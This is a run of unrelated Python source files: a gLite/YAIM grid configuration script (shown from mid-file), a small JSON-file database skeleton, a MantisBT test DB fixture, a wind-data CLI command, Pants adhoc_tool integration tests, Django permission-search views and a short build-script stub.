updateParamNode( vo[tagName].getElementsByTagName( 'voms.cert.subj' )[0], \
stripQuotes( value.split( ' ' )[3] ), 'voms.cert.subj' )
else:
for gParam in mapYaim2gLite ( param ):
nodes = vo[tagName].getElementsByTagName( gParam )
if len( nodes ) == 0:
createParameter( tagName, value, gParam )
else:
updateParamNode( nodes[0], value, yaimName )
# glite UI set structure
def createUIsetContainer( VO ):
setContainer = GliteUIsetParams( VO )
if environ.has_key( 'WMS_HOST' ):
setContainer.addNS( replaceParameter( environ['WMS_HOST'] ), [replaceParameter( environ['WMS_HOST'] )] )
else:
print "[WARNING] No WMS_HOST defined. gLite UI will not be configured !!"
setContainer.addParameter( "ui.voms.server", getParam( vo[VO], 'voms.hostname' ) )
setContainer.addParameter( "ui.voms.port", getParam( vo[VO], 'voms.port.number' ) )
setContainer.addParameter( "ui.voms.cert.url", "" )
setContainer.addParameter( "ui.voms.cert.subject", getParam( vo[VO], 'voms.cert.subj' ) )
setContainer.addParameter( "ui.MyProxyServer", replaceParameter( environ['PX_HOST'] ) )
setContainer.addParameter( "ui.HLRLocation", "" )
setContainer.addArrayParameter( "ui.wms-proxy.endpoints", ['https://%s:7443/glite_wms_wmproxy_server' % replaceParameter( environ['WMS_HOST'] )] )
return setContainer.getNode()
# vo, vo, ns.name, lb.name, voms.name, voms.port, voms.cert.subj, wmsproxy.endpoints, myproxy.name, hlr.location
def updateTorqueConfig( dom ):
print "Parsing torque configuration"
instances = dom.getElementsByTagName( 'instance' )
yaimQueueList = replaceParameter( environ['QUEUES'] ).split( " " )
yaimWNList = open( replaceParameter( environ['WN_LIST'] ) ).readlines()
# Cleanup wn entries from whitespace
tmpList = []
for wn in yaimWNList:
if not wn.strip() == '':
tmpList.append( wn.strip() )
yaimWNList = tmpList
rootNode = dom.getElementsByTagName( 'config' )[0]
print "Worker nodes:"
for wn in dom.getElementsByTagName( 'torque-wn.name' ):
if wn.getAttribute( 'value' ) in yaimWNList:
print "Keeping configuration for WN " + wn.getAttribute( 'value' )
yaimWNList.remove( wn.getAttribute( 'value' ) )
else:
print "Remove configuration for WN " + wn.getAttribute( 'value' )
instanceNode = wn.parentNode.parentNode
rootNode.removeChild( instanceNode )
for wn in yaimWNList:
print "Adding configuration for WN " + wn
rootNode.appendChild( createWNInstance( wn ) )
print "Queues:"
queue_list = {}
for queue in dom.getElementsByTagName( 'queue.name' ):
if queue.getAttribute( 'value' ) in yaimQueueList:
print "Keeping configuration for queue " + queue.getAttribute( 'value' )
yaimQueueList.remove( queue.getAttribute( 'value' ) )
queue_list[queue.getAttribute( 'value' )] = queue.parentNode
else:
print "Remove configuration for queue " + queue.getAttribute( 'value' )
instanceNode = queue.parentNode.parentNode
rootNode.removeChild( instanceNode )
for queue in yaimQueueList:
print "Adding configuration for queue " + queue
queue_node = createQueueInstance( queue )
queue_list[queue] = queue_node
rootNode.appendChild( queue_node )
# Set up the queue group ACLs
acl = {}
for param in environ:
if param.startswith( "VO_" ) and param.endswith( "_QUEUES" ):
vo_name = param.split( "_" )[1]
group = getPoolName ( vo_name )[1]
queue_names = environ[param].split( ' ' )
acl_str = " +%s" % group
for queue_name in queue_names:
#print "ACL for: %s" % queue_name
if acl.has_key( queue_name ):
acl[queue_name] = acl[queue_name] + acl_str
else:
acl[queue_name] = acl_str
for queue in queue_list:
updateParamNode( queue_list[queue].getElementsByTagName( 'queue.acl.groups' )[0], acl[queue], "", "Value derived from VO definition" )
# glite torque server WN structure
def createWNInstance( WN ):
container = xmlUtils.getContainerTemplate( 'glite-wn' )
container.setAttribute( 'name', WN )
updateParamNode( container.getElementsByTagName( 'torque-wn.name' )[0], WN, "", "from WN-LIST file" )
return container
def createQueueInstance( queue ):
container = xmlUtils.getContainerTemplate( 'torque-queue' )
container.setAttribute( 'name', 'torque-queue-%s' % queue )
updateParamNode( container.getElementsByTagName( 'queue.name' )[0], queue, 'QUEUES' )
return container
def getParam( dom, name ):
return dom.getElementsByTagName( name )[0].getAttribute( 'value' )
def buildUIsets( ui_conf ):
ui_dom, ui_keys = ui_conf
sets = ui_dom.getElementsByTagName( 'set' )
# remove all sets
for set in sets:
ui_dom.documentElement.removeChild( set )
# for each VO create the set
for VO in vo:
ui_dom.documentElement.appendChild( createUIsetContainer( VO ) )
def parse_yaim( yaim_file ):
try:
lines=open( yaim_file, 'r' ).readlines()
except IOError:
print "Error: Site Info file %s not found" % yaim_file
sys.exit( 1 )
lastkey=''
for line in lines:
line=line.replace( '\"', '' ).replace( '\'', '' )
if line.find( '#' ) > -1:
line=line[0:line.find( '#' )]
if line.find( '=' ) > -1:
( key, value ) = line.split( '=', 1 )
environ[key]=value[:-1].strip()
lastkey=key
else:
if len( line.strip() ) > 1 and len( lastkey ) > 1:
environ[key]=environ[key] + " " + line[:-1].strip()
return
def parseVomsesString( string ):
split = [[' ','"',"'"],['"',"'"]]
if string.count('"') + string.count("'") == 0:
return string.split(' ')
ret = []
tmp = string.split(" ", 3)
for i in xrange(3):
ret.append(stripQuotes(tmp[i]))
tmp[3] = tmp[3].lstrip()
if not tmp[3][0] in split[1]:
end = tmp[3].find(' ')
else:
end = tmp[3][1:].find(tmp[3][0])
ret.append(stripQuotes(tmp[3][:end]))
tmp[3] = stripQuotes(tmp[3][end+1:]) + ' '
ret.append(stripQuotes(tmp[3][:tmp[3].find(' ')]))
return ret
def getParamNames( node ):
nodeList = []
parameterNodes = node.getElementsByTagName( 'parameters' )
for node in parameterNodes:
for child in node.childNodes:
if child.nodeType == Node.ELEMENT_NODE:
nodeList.append( child.nodeName )
return nodeList
def getMappingAndDefaults( map_file ):
try:
lines=open( map_file, 'r' ).readlines()
except IOError:
print "Error: Map file %s not found" % map_file
sys.exit( 1 )
for line in lines:
line.strip()
if line[0]!="#" and len( line ) > 1:
if line.count( '=' ) > 0:
( key, value ) = line.split( '=', 1 )
defaults[key] = value.strip()
if line.count( ':' ) > 0:
( key, value ) = line.split( ':', 1 )
map[key] = value.strip().split( ',' )
return
def parseNewVOParams( ):
for vo in replaceParameter(environ['VOS'].split()):
tmpParam = {}
voParamsFile = "%s/vo.d/%s" % (environ['config_dir'], vo.lower())
if os.path.exists(voParamsFile):
envLines = os.popen("%s/../libexec/parse_bash_params %s" % (os.environ['FUNCTIONS_DIR'], voParamsFile)).readlines()
configLines = open(voParamsFile).readlines()
for param in envLines:
if not (param.strip() == '' or param.strip() == '#' or param.find('=') == -1 ):
(p_name, p_value) = param.split("=",1)
tmpParam[p_name] = p_value
for line in configLines:
p_name = line.split("=",1)[0]
if tmpParam.has_key(p_name):
# Add parameter entry following old rules.
# Shell forbidden characters will not cause problems since these are only Python dictionary object
environ["VO_%s_%s" %(vo.upper(), p_name.upper())] = tmpParam[p_name]
#print "Added VO_%s_%s = %s" % (vo.upper(), p_name.upper(), tmpParam[p_name])
return
def checkArrayValues(node, value):
ret = False
for child in node.childNodes:
if child.nodeType == Node.ELEMENT_NODE and child.nodeName == 'value':
if child.hasChildNodes():
if child.childNodes[0].nodeValue == value:
ret = True
else:
child.parentNode.removeChild(child)
return ret
def addArrayEntry(node, value):
#print value
if not checkArrayValues(node, value):
newDoc = parseString( '<value/>' )
newItem = newDoc.documentElement
if not value.strip() == '':
newItem.appendChild( newDoc.createTextNode( value.strip() ) )
node.appendChild( newItem )
if __name__ == '__main__':
# Check that the required environment has been defined
for variable in ['FUNCTIONS_DIR', 'SITE_INFO', 'NODE_TYPE_LIST' ]:
if not os.environ.has_key( variable ):
print "Error: %s not set." %variable
sys.exit( 1 )
vo={}
map={}
defaults={}
environ={}
# Get Mapping and default parameters
map_file=replaceParameter(os.environ['FUNCTIONS_DIR']) + '/../libexec/gLite.def'
getMappingAndDefaults( map_file )
# Parse YAIM parameters
yaim_file=os.environ['SITE_INFO']
environ = os.environ
# Add New VO parameters
parseNewVOParams()
# Merge defaults with parsed YAIM parameters
environ.update( defaults )
working_dir = replaceParameter( environ['GLITE_LOCATION'] ) + '/etc/config/'
# Copy files from templates if they doesn't exist in the config dir
templates = []
for file in os.listdir( working_dir + 'templates' ):
if file.endswith( '.cfg.xml' ):
templates.append( file )
for file in templates:
try:
os.stat( working_dir + file )
except OSError:
shutil.copy( working_dir + '/templates/%s' % file, working_dir )
# Temporary hack
try:
os.remove( working_dir + 'glite-rgma-servicetool-externalServices.cfg.xml' )
os.remove( working_dir + 'vo-list.cfg.xml' )
os.remove( working_dir + 'glite-service-discovery.file-based-example.cfg.xml' )
os.remove( working_dir + 'glite-ce-site-config.xml' )
os.remove( working_dir + 'glite-lfc-client.cfg.xml' )
except:
pass
# Parse all gLite configuration files
gLiteDom = {}
for file in templates:
try:
tmpDom = parse( working_dir + file )
except IOError:
print "Skipping file %s" % file
continue
# Read VO definitions from the glite-global.cfg.xml file if exist
if file == 'glite-global.cfg.xml':
for VO in tmpDom.getElementsByTagName( 'vo' ):
vo[VO.getAttribute( 'name' ).lower()] = VO
tmpDom.documentElement.removeChild( VO )
# Update parameters if they are in templates but not in the active config file
try:
templateDom = parse(working_dir + "templates/" + file)
templateParameterList = getParamNames(templateDom)
except IOError:
print "WARNING file %s has no template" % file
parameterList = getParamNames( tmpDom )
for parameter in templateParameterList:
if not parameter in parameterList:
print "Adding parameter %s into %s" % (parameter, file)
tmpDom.getElementsByTagName( 'parameters' )[0].\
appendChild (templateDom.getElementsByTagName( parameter )[0])
parameterList.append( parameter )
gLiteDom[file] = ( tmpDom, parameterList )
# Special treatement for docndor TCP port range
if environ.has_key( "GLOBUS_TCP_PORT_RANGE" ):
environ['condor.LOWPORT'] =\
multiSplit(stripQuotes( environ['GLOBUS_TCP_PORT_RANGE'] ), " ,")[0]
environ['condor.HIGHPORT'] =\
multiSplit(stripQuotes( environ['GLOBUS_TCP_PORT_RANGE'] ), ' ,' )[1]
for param in environ:
#print param
if param.startswith( "VO_" ) and not param in ['VO_SW_DIR']:
# Create/modify VO definition
updateContainerParameter( param, environ[param] )
elif param.find("_GROUP_ENABLE") > -1:
pass
#for entry in environ[param].split(" "):
# add array entry ......
# addArrayEntry(vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
# stripQuotes( param.split("_")[0].lower()))
#updateParamNode( vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
# stripQuotes( param.split("_")[0].lower()), 'cemon.queues' )
else:
# Update parameter in all configuration files if exist
gLiteParamList = mapYaim2gLite( param )
for gLiteParam in gLiteParamList:
for gDOM in gLiteDom:
if gLiteParam in gLiteDom[gDOM][1]:
nodes = gLiteDom[gDOM][0].getElementsByTagName( gLiteParam )
for node in nodes:
updateParamNode( node, environ[param], param )
# Manage QUEUES
import string
for queue in os.environ['QUEUES'].split(" "):
queue_ = queue.translate(string.maketrans('.-','__')).upper()
for entry in environ["%s_GROUP_ENABLE" % queue_ ].split(" "):
try:
# add array entry ......
addArrayEntry(vo[entry.lower()].getElementsByTagName( 'cemon.queues' )[0], \
queue.lower())
except:
# Should be possible to ignore it since this information is used only in TORQUE_server (not Python)
# And publication on glite-CE (done through config_gip)
pass
# Check if we configure also UI
if 'UI' in os.environ['NODE_TYPE_LIST'].split() or \
'TAR_UI' in os.environ['NODE_TYPE_LIST'].split() or \
'VOBOX' in os.environ['NODE_TYPE_LIST'].split():
buildUIsets( gLiteDom['glite-ui.cfg.xml'] )
#Write out new files and back up the old ones
for file in templates:
if file == 'glite-global.cfg.xml':
for voCont in vo:
gLiteDom[file][0].documentElement.appendChild( vo[voCont].cloneNode( 'deep' ) )
try:
os.rename( working_dir + file, working_dir + file + '.bak' )
except OSError:
continue
output = open( working_dir + file, 'w' )
gliteXMLWriter().write( gLiteDom[file][0], output )
output.close()
sys.exit( 0 )
|
# -*- coding: utf-8 -*-
"""
Created on Thu Mar 10 00:17:40 2016
@author: alex
"""
#Base class which other iterators will inherit from
class Iterator(object):
"""
:param Scene scene: Internal Scene
:param String name: Iterator name
"""
def __init__(self, obj, name):
self.obj = obj
self.name = name
def get_name(self):
return self.name
# """
# :param Method function: The function to recurse
# """
# def iterate(self, function):
# pass
#This is implemented and called in each successive iterator to determine how iterations happen
#--------Example of passing function down the stack--------
# class Foo(object):
# def method1(self):
# pass
# def method2(self, method):
# return method()
#
# foo = Foo()
# foo.method2(foo.method1)
#
#From http://stackoverflow.com/questions/706721/how-do-i-pass-a-method-as-a-parameter-in-python#706735 |
import os
import json
from datetime import date
from simple_database.exceptions import ValidationError
from simple_database.config import BASE_DB_FILE_PATH
class Row(object):
def __init__(self, row):
for key, value in row.items():
setattr(self, key, value)
class Table(object):
def __init__(self, db, name, columns=None):
self.db = db
self.name = name
self.table_filepath = os.path.join(BASE_DB_FILE_PATH, self.db.name,
'{}.json'.format(self.name))
# In case the table JSON file doesn't exist already, you must
# initialize it as an empty table, with this JSON structure:
# {'columns': columns, 'rows': []}
if not os.path.exists(self.table_filepath):
with open(self.table_filepath, 'r+') as f:
initial_structure = {'columns': columns, 'rows': []}
f.write(json.dumps(initial_structure))
self.columns = columns or self._read_columns()
def _read_columns(self):
# Read the columns configuration from the table's JSON file
# and return it.
pass
def insert(self, *args):
# Validate that the provided row data is correct according to the
# columns configuration.
# If there's any error, raise ValidationError exception.
# Otherwise, serialize the row as a string, and write to to the
# table's JSON file.
pass
def query(self, **kwargs):
# Read from the table's JSON file all the rows in the current table
# and return only the ones that match with provided arguments.
# We would recommend to use the `yield` statement, so the resulting
# iterable object is a generator.
# IMPORTANT: Each of the rows returned in each loop of the generator
# must be an instance of the `Row` class, which contains all columns
# as attributes of the object.
pass
def all(self):
# Similar to the `query` method, but simply returning all rows in
# the table.
# Again, each element must be an instance of the `Row` class, with
# the proper dynamic attributes.
pass
def count(self):
# Read the JSON file and return the counter of rows in the table
with open(self.table_filepath, 'r') as f:
table_rows = json.load(f)['rows']
return len(table_rows)
def describe(self):
# Read the columns configuration from the JSON file, and return it.
pass
class DataBase(object):
def __init__(self, name):
self.name = name
self.db_filepath = os.path.join(BASE_DB_FILE_PATH, self.name)
self.tables = self._read_tables()
@classmethod
def create(cls, name):
# if the db directory already exists, raise ValidationError
# otherwise, create the proper db directory
db_filepath = os.path.join(BASE_DB_FILE_PATH, name)
if os.path.exists(db_filepath):
error_msg = 'Database with name "{}" already exists.'.format(name)
raise ValidationError(error_msg)
else:
os.makedirs(db_filepath)
def _read_tables(self):
# Gather the list of tables in the db directory looking for all files
# with .json extension.
# For each of them, instantiate an object of the class `Table` and
# dynamically assign it to the current `DataBase` object.
# Finally return the list of table names.
# Hint: You can use `os.listdir(self.db_filepath)` to loop through
# all files in the db directory
database_tables = [file.split('.')[0] for file in os.listdir(self.db_filepath)
if file.endswith('.json')]
for table in database_tables:
setattr(self, table, Table(db=self, name=table))
return database_tables
def create_table(self, table_name, columns):
# Check if a table already exists with given name. If so, raise
# ValidationError exception.
# Otherwise, crete an instance of the `Table` class and assign
# it to the current db object.
# Make sure to also append it to `self.tables`
if table_name in self._read_tables():
error_msg ='Table with name "{}" already exists.'.format(table_name)
raise ValidationError(error_msg)
else:
table = Table(db=self, name=table_name)
setattr(self, table_name, table)
self.tables.append(table_name)
def show_tables(self):
# Return the current list of tables.
return self.tables
def create_database(db_name):
"""
Creates a new DataBase object and returns the connection object
to the brand new database.
"""
DataBase.create(db_name)
return connect_database(db_name)
def connect_database(db_name):
"""
Connects to an existing database, and returns the connection object.
"""
return DataBase(name=db_name) |
# -*- coding: utf-8 -*-
import random
from test_adds import adjustement
import pymysql.cursors
# import mysql.connector
from model.project import Project
class DbFixture:
def __init__(self, host, name, user, password):
self.host = host
self.name = name
self.user = user
self.password = password
self.connection = pymysql.connect(host=host, database=name, user=user, password=password, autocommit=True)
def get_project_list(self):
list =[]
cursor = self.connection.cursor()
# sprawdzić czy można zamiast poniższego użyć kontrukcji with
try:
cursor.execute('select name, status, inherit_global, view_state, description from mantis_project_table')
for row in cursor:
(name, status, inherit_categories, view_status, description) = row
list.append(Project(name=name, status=status, inherit_categories=inherit_categories, view_status=view_status, description=adjustement.delete_break_line_DB(description)))
finally:
cursor.close()
return list
# def get_one_project(self):
# list = []
# cursor = self.connection.cursor()
# # sprawdzić czy można zamiast poniższego użyć kontrukcji with
# try:
# cursor.execute('select name, status, inherit_global, view_state, description from mantis_project_table limit 1')
# for row in cursor:
# (name, status, inherit_categories, view_status, description) = row
# list.append(
# Project(name=name, status=status, inherit_categories=inherit_categories, view_status=view_status,
# description=description))
# finally:
# cursor.close()
# return list
def get_one_project(self):
list = []
cursor = self.connection.cursor()
# sprawdzić czy można zamiast poniższego użyć kontrukcji with
try:
cursor.execute('select name, status, inherit_global, view_state, description from mantis_project_table')
for row in cursor:
(name, status, inherit_categories, view_status, description) = row
list.append(
Project(name=name, status=status, inherit_categories=inherit_categories, view_status=view_status,
description=description))
finally:
cursor.close()
return random.choice(list)
def destroy(self):
self.connection.close() |
import logging
from datetime import datetime
from powersimdata.input.grid import Grid
from prereise.cli.constants import (
DATE_FMT,
END_DATE_HELP_STRING,
FILE_PATH_HELP_STRING,
GRID_MODEL_DEFAULT,
GRID_MODEL_HELP_STRING,
REGION_CHOICES,
START_DATE_HELP_STRING,
)
from prereise.cli.data_sources.data_source import DataSource
from prereise.cli.helpers import validate_date, validate_file_path
from prereise.gather.winddata.rap import impute, rap
class WindDataRapidRefresh(DataSource):
@property
def command_name(self):
"""See :py:func:`prereise.cli.data_sources.data_source.DataSource.command_name`
:return: (*str*)
"""
return "wind_data_rap"
@property
def command_help(self):
"""See :py:func:`prereise.cli.data_sources.data_source.DataSource.command_help`
:return: (*str*)
"""
return "Download wind data from National Centers for Environmental Prediction"
@property
def extract_arguments(self):
"""See :py:func:`prereise.cli.data_sources.data_source.DataSource.extract_arguments`
:return: (*str*)
"""
return [
{
"command_flags": ["--region", "-r"],
"required": True,
"choices": REGION_CHOICES,
"type": str,
"action": "append",
},
{
"command_flags": ["--start_date", "-sd"],
"required": True,
"type": validate_date,
"help": START_DATE_HELP_STRING,
},
{
"command_flags": ["--end_date", "-ed"],
"required": True,
"type": validate_date,
"help": END_DATE_HELP_STRING,
},
{
"command_flags": ["--file_path", "-fp"],
"required": True,
"type": validate_file_path,
"help": FILE_PATH_HELP_STRING,
},
{
"command_flags": ["--grid_model", "-gm"],
"required": False,
"default": GRID_MODEL_DEFAULT,
"choices": list(Grid.SUPPORTED_MODELS),
"help": GRID_MODEL_HELP_STRING,
},
{
"command_flags": ["--no_impute", "-ni"],
"action": "store_true",
"help": "Flag used to avoid naive gaussian imputing of missing data",
},
]
def extract(
self, region, start_date, end_date, file_path, grid_model, no_impute, **kwargs
):
"""See :py:func:`prereise.cli.data_sources.data_source.DataSource.extract`
:param list region: list of regions to download wind farm data for
:param str start_date: date designating when to start the data download
:param str end_date: date designating when to end the data download
:param str file_path: file location on local filesystem on where to store the data
:param str grid_model: .mat file path for a grid model or a string supported by
`powersimdata.input.grid.Grid.SUPPORTED_MODELS`
:param bool no_impute: flag used to avoid naive gaussian imputing of missing data
"""
assert datetime.strptime(start_date, DATE_FMT) <= datetime.strptime(
end_date, DATE_FMT
)
grid = Grid(region, source=grid_model)
wind_farms = grid.plant.groupby("type").get_group("wind")
data, missing = rap.retrieve_data(
wind_farms, start_date=start_date, end_date=end_date
)
if len(missing) > 0:
logging.warning(f"There are {len(missing)} files missing")
# Imputing any missing data in place
if not no_impute:
logging.warning("Performing naive gaussian imputing of missing data")
impute.gaussian(data, wind_farms, inplace=True)
data.to_pickle(file_path)
|
# Copyright 2023 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from textwrap import dedent
import pytest
from pants.testutil.pants_integration_test import run_pants, setup_tmpdir
def test_system_binary_and_adhoc_tool() -> None:
sources = {
"src/test_file.txt": dedent(
"""\
I am a duck.
"""
),
"src/BUILD": dedent(
"""\
files(name="files", sources=["*.txt",])
system_binary(
name="cat",
binary_name="cat",
)
adhoc_tool(
name="adhoc",
runnable=":cat",
execution_dependencies=[":files",],
args=["test_file.txt",],
log_output=True,
stdout="stdout",
)
"""
),
}
with setup_tmpdir(sources) as tmpdir:
args = [
"--backend-packages=['pants.backend.experimental.adhoc',]",
f"--source-root-patterns=['{tmpdir}/src']",
"export-codegen",
f"{tmpdir}/src:adhoc",
]
result = run_pants(args)
assert "[INFO] I am a duck." in result.stderr.strip()
@pytest.mark.parametrize(
("fingerprint,passes"),
(
(r"Binary Name v6\.32\.1", True),
(r"(.*)v6\.(.*)", True),
(r"Binary Name v6\.99999\.1", False),
),
)
def test_fingerprint(fingerprint: str, passes: bool) -> None:
sources = {
"src/BUILD": dedent(
f"""\
system_binary(
name="bash",
binary_name="bash",
fingerprint=r"{fingerprint}",
fingerprint_args=("-c", "echo Binary Name v6.32.1",),
)
adhoc_tool(
name="adhoc",
runnable=":bash",
args=["-c","echo I am a duck!"],
log_output=True,
stdout="stdout",
)
"""
),
}
with setup_tmpdir(sources) as tmpdir:
args = [
"--backend-packages=['pants.backend.experimental.adhoc',]",
f"--source-root-patterns=['{tmpdir}/src']",
"export-codegen",
f"{tmpdir}/src:adhoc",
]
result = run_pants(args)
if passes:
assert result.exit_code == 0
assert "[INFO] I am a duck!" in result.stderr.strip()
else:
assert result.exit_code != 0
assert "Could not find a binary with name `bash`" in result.stderr.strip()
def test_runnable_dependencies() -> None:
sources = {
"src/BUILD": dedent(
"""\
system_binary(
name="bash",
binary_name="bash",
)
system_binary(
name="awk",
binary_name="awk",
fingerprint_args=["--version"],
fingerprint=".*",
)
adhoc_tool(
name="adhoc",
runnable=":bash",
runnable_dependencies=[":awk",],
args=["-c", "awk 'BEGIN {{ print \\"I am a duck.\\" }}'"],
log_output=True,
stdout="stdout",
)
"""
),
}
with setup_tmpdir(sources) as tmpdir:
args = [
"--backend-packages=['pants.backend.experimental.adhoc',]",
f"--source-root-patterns=['{tmpdir}/src']",
"export-codegen",
f"{tmpdir}/src:adhoc",
]
result = run_pants(args)
assert "[INFO] I am a duck." in result.stderr.strip()
def test_external_env_vars() -> None:
sources = {
"src/BUILD": dedent(
"""\
system_binary(
name="bash",
binary_name="bash",
)
adhoc_tool(
name="adhoc",
runnable=":bash",
args=["-c", "echo $ENVVAR"],
log_output=True,
stdout="stdout",
extra_env_vars=["ENVVAR"],
)
"""
),
}
with setup_tmpdir(sources) as tmpdir:
args = [
"--backend-packages=['pants.backend.experimental.adhoc',]",
f"--source-root-patterns=['{tmpdir}/src']",
"export-codegen",
f"{tmpdir}/src:adhoc",
]
extra_env = {"ENVVAR": "clang"}
result = run_pants(args, extra_env=extra_env)
assert "[INFO] clang" in result.stderr.strip()
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import logging
from django.http import HttpResponse
from django.views.generic import TemplateView, ListView, DetailView
from django.db.models import Q
from priv.models import User, Role, Permission
# See search write up: https://wsvincent.com/django-search/
# logging.basicConfig() self.logger = logging.getLogger('logger')
# = list(obj.translations.all().values_list('pk', flat=True))
class QueryParser():
def __init__(self,view):
self.query = view.request.GET.get('q')
logging.basicConfig()
self.logger = logging.getLogger('logger')
def isActive(self):
return len(self.query)
def userFilter(self):
return self.parseQuery()
def roleFilter(self):
return self.parseQuery(role=True)
def userRoleFilter(self):
return self.parseQuery(roleu=True)
def permissionFilter(self):
return self.parseQuery(permission=True)
def permission2role(self):
f = Q()
if not self.query: return
for term in self.query.split():
term = term.strip()
if term.startswith("permission:"):
f = f | Q(permissions__permission_name=term[11:])# VS permission_name__icontains ?
self.query = self.query.replace(term,"")
if not len(f): return
for r in Role.objects.filter(f): # roles for this permission
self.query = self.query + " role:" + r.role_name
#self.logger.warning("QueryParser permission2role " + str(q) + " --> " + str(self.query) + " filter " + str(f) )
return
def parseQuery(self, role=False, roleu=False, permission=False):
f = Q()
if not self.query: return f
for term in self.query.split():
term = term.strip()
if not term: pass
if role and term.startswith("role:"):
f = f | Q(role_name__icontains=term[5:])
elif roleu and term.startswith("role:"):
f = f | Q(role__role_name=term[5:])
elif permission and term.startswith("permission:"):
f = f | Q(permission_name__icontains=term[11:])
elif role: pass
elif roleu: pass
elif permission: pass
elif term.startswith("role:"): pass
elif term.startswith("permission:"): pass
elif term.startswith("first:"): f = f | Q(first_name__icontains=term[6:])
elif term.startswith("last:"): f = f | Q(last_name__icontains=term[5:])
elif term.startswith("acct:"): f = f | Q(acct_name__icontains=term[5:])
else:
f = f | Q(first_name__icontains=term) | Q(last_name__icontains=term) | Q(acct_name__icontains=term)
self.logger.warning("QueryParser " + str(role) + str(roleu) + " " + str(permission) + " " + str(self.query) + " is " + str(f) )
return f
#def index(request):
# return HttpResponse("Placeholder index for app <tt>priv</tt>")
class IndexView(TemplateView):
template_name = 'index.html'
class SearchView(TemplateView):
template_name = 'search.html'
class CheckView(TemplateView):
template_name = 'search.html'
class ResultsView(ListView):
model = User
template_name = 'results.html'
def get_queryset(self):
parser = QueryParser(self)
parser.permission2role()
object_list = User.objects.filter( parser.userFilter() ).filter( parser.userRoleFilter() ).order_by('acct_name').distinct()
return object_list
class DetailView(DetailView): # or --> TemplateView
model = User
template_name = 'detail.html'
def get_context_data(self, **kwargs):
context = super(DetailView,self).get_context_data(**kwargs)
user_object = User.objects.filter(id=int(self.kwargs['pk']))[:1].get()
u = user_object
u.perms = set()
u.roles = Role.objects.filter(users__acct_name=u.acct_name)
for r in u.roles:
u.perms.update( r.permissions.all() )
for p in u.perms:
p.roles = u.roles.filter(permissions__permission_name=p.permission_name)
context['permission_list'] = u.perms
context['user_object'] = u
return context
class RoleUserView(ListView):
model = User
template_name = 'role_user.html'
def get_queryset(self):
parser = RoleUserView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
parser = RoleUserView.query
context = super(RoleUserView,self).get_context_data(**kwargs)
roles = Role.objects.filter(parser.roleFilter())
rm = Q()
if parser.isActive():
for r in roles:
if not r.users.filter(parser.userFilter()).order_by('acct_name').distinct():
rm = rm | Q(id=r.id)
roles = Role.objects.exclude(rm).filter(parser.roleFilter())
for r in roles:
r.users_list = r.users.filter(parser.userFilter()).order_by('acct_name').distinct()
context['role_list'] = roles
return context
class UserRoleView(ListView):
model = User
template_name = 'user_role.html'
def get_queryset(self):
parser = UserRoleView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
context = super(UserRoleView,self).get_context_data(**kwargs)
parser = UserRoleView.query
parser.permission2role()
users = User.objects.filter(parser.userFilter()).filter(parser.userRoleFilter())
for u in users:
u.roles = Role.objects.filter(users__acct_name=u.acct_name).filter(parser.roleFilter())
context['user_list'] = users
return context
class UserPermissionView(ListView):
model = User
template_name = 'user_permission.html'
def get_queryset(self):
parser = UserPermissionView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
context = super(UserPermissionView,self).get_context_data(**kwargs)
parser = UserPermissionView.query
parser.permission2role()
users = User.objects.filter( parser.userFilter() ).filter(parser.userRoleFilter() )
for u in users:
u.perms = set()
for r in Role.objects.filter(users__acct_name=u.acct_name):
u.perms.update( r.permissions.filter(parser.permissionFilter()))
context['user_list'] = users
return context
class PermissionUserView(ListView):
model = User
template_name = 'permission_user.html'
def get_queryset(self):
parser = PermissionUserView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
parser = PermissionUserView.query
context = super(PermissionUserView,self).get_context_data(**kwargs)
perms = Permission.objects.filter(parser.permissionFilter())
rm = Q()
for p in perms:
p.users = set()
for r in Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name):
p.users.update(r.users.filter(parser.userFilter()))
if parser.isActive and not len(p.users):
rm = rm | Q(id=p.id)
perms = Permission.objects.exclude(rm).filter(parser.permissionFilter())
for p in perms:
p.users = set()
for r in Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name):
p.users.update(r.users.filter(parser.userFilter()))
context['permission_list'] = perms
return context
class PermissionRoleView(ListView):
model = User
template_name = 'permission_role.html'
def get_queryset(self):
parser = PermissionRoleView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
context = super(PermissionRoleView,self).get_context_data(**kwargs)
parser = PermissionRoleView.query
perms = Permission.objects.filter(parser.permissionFilter())
rm = Q()
for p in perms:
p.roles = Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name)
if parser.isActive and not p.roles:
rm = rm | Q(id=p.id)
perms = Permission.objects.exclude(rm).filter(parser.permissionFilter())
for p in perms:
p.roles = Role.objects.filter(parser.roleFilter()).filter(permissions__permission_name=p.permission_name)
context['permission_list'] = perms
return context
class RolePermissionView(ListView):
model = User
template_name = 'role_permission.html'
def get_queryset(self):
parser = RolePermissionView.query = QueryParser(self)
object_list = User.objects.filter(parser.userFilter()).order_by('acct_name').distinct()
return object_list
def get_context_data(self, **kwargs):
context = super(RolePermissionView,self).get_context_data(**kwargs)
parser = RolePermissionView.query
roles = Role.objects.filter(parser.roleFilter())
rm = Q()
for r in roles:
r.permissions_list = [ p.permission_name for p in r.permissions.filter(parser.permissionFilter()) ]
if parser.isActive and not len(r.permissions_list):
rm = rm | Q(id=r.id)
roles = Role.objects.exclude(rm).filter(parser.roleFilter())
for r in roles:
r.permissions_list = [ p.permission_name for p in r.permissions.filter(parser.permissionFilter()) ]
context['role_list'] = roles
return context
|
#!/usr/bin/env python
# Copyright (c) 2011 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import sys
data = open(sys.argv[3], 'r').read()
